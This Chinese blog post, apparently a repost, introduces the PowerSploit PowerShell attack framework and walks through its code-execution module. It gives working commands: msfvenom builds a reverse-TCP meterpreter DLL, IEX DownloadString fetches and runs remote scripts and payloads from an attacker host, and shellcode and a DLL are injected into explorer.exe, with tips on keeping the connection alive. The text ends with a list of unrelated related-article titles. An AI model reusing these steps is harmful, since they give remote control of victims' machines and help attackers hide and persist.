首先介绍一下国外大牛制作的Powershell渗透工具PowerSploit,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察、权限提升、权限维持。

项目地址:https://github.com/PowerShellMafia/PowerSploit

该利器主要分为几个板块

一、代码执行(CodeExecution)

1. Invoke-DllInjection

2. Invoke-ReflectivePEInjection

3. Invoke-Shellcode

4. Invoke-WmiCommand

二、脚本修改(ScriptModification)

1. Out-EncodedCommand

2. Out-CompressedDll

3. Out-EncryptedScript

4. Remove-Comments

三、权限维持(Persistence)

1. New-UserPersistenceOption

2. New-ElevatedPersistenceOption

3. Add-Persistence

4. Install-SSP

5. Get-SecurityPackages

四、绕过杀毒软件(AntivirusBypass)

Find-AVSignature

五、信息收集(Exfiltration)

这个文件夹主要是收集目标主机上的信息。

六、信息侦察(Recon)

这个文件夹主要是以目标主机为跳板进行内网主机侦察。

总结下就是:

CodeExecution 在目标主机执行代码

ScriptModification 在目标主机上创建或修改脚本

Persistence 后门脚本(持久性控制)

AntivirusBypass 发现杀软查杀特征

Exfiltration 目标主机上的信息搜集工具

Mayhem 蓝屏等破坏性脚本

Recon 以目标主机为跳板进行内网信息侦查

安装方法

我们在Linux下首先clone这个git:

git clone https://github.com/PowerShellMafia/PowerSploit.git

然后将clone下的文件放入保证被攻击机能够访问的机器上面,这里我们采用本机,在本机搭建apache环境,将文件放入/var/www/html目录下即可。
开启apache服务:

service apache2 start

实战运用:

CodeExecution模块

a) 调用Invoke-Shellcode将shellcode注入到本地的Powershell。

1)利用msfvenom生成一个反弹木马,以供invoke-shellcode注入,同样生成的反弹马放入web中。

2) 调用目标机的powershell进行IEX远程下载invoke-shellcode脚本和生成的木马

首先下载脚本

PS C:\Documents and Settings\Administrator> IEX(New-Object Net.Webclient).DownloadString("http://192.168.190.141/PowerSp
loit/CodeExecution/Invoke-Shellcode.ps1")

下载生成好的木马

PS C:\Users\Administrator> IEX(New-Object Net.Webclient).DownloadString("http://192.168.190.141/code")

3)kali设置msf监听

4)在powershell中调用invoke-shellcode(可通过help命令来查询具体操作以及例子)。

PS C:\Users\Administrator> Invoke-Shellcode -Shellcode $buf -Force

b) 调用invoke-shellcode将shellcode注入到指定的进程中。

1)前面步骤和a的步骤一致,唯一不同的就是在最后的命令上,首先,查看我们需要注入的进程,建议可注入到系统的进程,因为一旦进程关闭,那么监听也将终断,因此系统进程一般不会被关闭,注意:不能注入到像360等驱动中,不然会被强制关闭。

比如我要注入explorer这个进程(Windows程序管理器或者文件资源管理器) ,首先要查看该进程的pid

ps -Name explorer

可以看到id为1228 注入该进程

Invoke-Shellcode -Shellcode $buf -ProcessID 1228 -Force

注意:和a类似的,若关闭注入的进程,则连接中断。

c) 调用invoke-dllinjection将DLL注入到进程中。

1)通过msfvenom生成DLL的反弹木马,并下载到目标主机中(为了方便,直接将dll文件下载至powershell运行的桌面),在实际环境中,也可以通过该方法进行传输dll文件。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.190.141 lport=4444 -f dll -o /var/www/html/code.dll

开启监听 注意payload需要和生成的dll执行的payload一致;

PS C:\Users\Administrator> IEX(New-Object Net.Webclient).DownloadString("http://192.168.190.141/PowerSploit/CodeExecutio
n/Invoke-DllInjection.ps1")

注入

PS C:\Users\Administrator> Invoke-DllInjection -Dll .\code.dll -ProcessID 2700

转载于:https://www.cnblogs.com/-qing-/p/10539471.html

PowerSploit-CodeExecution(代码执行)脚本渗透实战相关推荐

  1. POWERSPLOIT-Recon(信息侦察)脚本渗透实战

    Recon(信息侦察)模块 a) 调用invoke-Portscan扫描内网主机的端口. 1)通过IEX下载并调用invoke-portscan. PS C:\Users\Administrator& ...

  2. PHP 命令行模式实战之cli+mysql 模拟队列批量发送邮件(在Linux环境下PHP 异步执行脚本发送事件通知消息实际案例)...

    源码地址:https://github.com/Tinywan/PHP_Experience 测试环境配置: 环境:Windows 7系统 .PHP7.0.Apache服务器 PHP框架:ThinkP ...

  3. 渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root

    靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列的三个 ...

  4. ElasticSearch Groovy脚本远程代码执行漏洞

    什么是ElasticSearch? 它是一种分布式的.实时性的.由JAVA开发的搜索和分析引擎. 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由 ...

  5. c++获取一段代码的执行时间_微软IE浏览器JScript脚本引擎远程代码执行漏洞通告...

    文档信息 编号 QiAnXinTI-SV-2019-0022 关键字 IE JScript RCE 远程命令执行CVE-2019-1367 发布日期 2019年09月24日 更新日期 2019年09月 ...

  6. thinkphp5调用shell脚本_thinkphp5.x全版本任意代码执行getshell

    ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的ge ...

  7. Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本

    Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题. 其中最最简单的方法就是使用搜索引擎的hac ...

  8. 实战-PHP远程代码执行漏洞

    环境搭建 搭建go语言环境 tar -C /usr/local -xzf go1.13.3.linux-amd64.tar.gz #解压go环境到常用命令的目录下 └─# echo "exp ...

  9. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

最新文章

  1. 怎么选择网管型和非网管型交换机
  2. ustc小道消息20220104
  3. Python OpenCV人脸识别案例
  4. oracle数据结构是什么意思,Oracle数据结构知多少(一)
  5. 计算机网络专业图片,计算机网络专业个人简历封面图片
  6. ip冲突 scan windows_如何检测IP有冲突 - 卡饭网
  7. JQuery 插件之Ajax Autocomplete(ajax自动完成)
  8. ios调用restful接口_iPhone中调用RESTFUL Service
  9. ipython 安装_IPYTHON安装.DOC
  10. 软件设计学习笔记2_体系研究与DoD体系架构框架(DoDAF)简介
  11. C语言运算符的优先级与结合性
  12. Android 蓝牙配对、连接和通信
  13. xmind安装及导出pdf
  14. 哔哩哔哩电脑网页版怎么下载视频
  15. 张小龙是高球冠军,大前研一是物理学家:​为什么牛人在很多领域都是世界第一?...
  16. 计算机教室使用与管理制度,《计算机教室使用与管理制度》
  17. WIN10华硕解决无法调节电脑亮度
  18. 云计算演义(2)企业IT之王IBM互联网之王Google数据库之王Oracle狂奔在与关闭公有云赛跑的路上(上)
  19. 根据前序遍历和中序遍历的结果重建二叉树
  20. 总结VUE控制滚动滑动方法

热门文章

  1. 【收藏】sonar-scanner扫描代码出错 SonarQube svn: E170001
  2. Linux nginx搭建文件服务器
  3. Linux DNS服务配置与管理详解
  4. HDFS常用端口及参数释义
  5. 【收藏】Harbor私有仓库中如何彻底删除镜像释放存储空间:vmware/registry:2.6.2-photon进行垃圾回收
  6. Jenkins升级(rpm方式安装)教程
  7. nl.basjes.parse.useragent.UserAgentAnalyzer内存泄漏问题解决
  8. jdk11默认使用的垃圾回收器是G1
  9. 前端动态菜单权限、按钮权限实现思路
  10. springboot @PropertySource+@Value注入properties配置文件属性值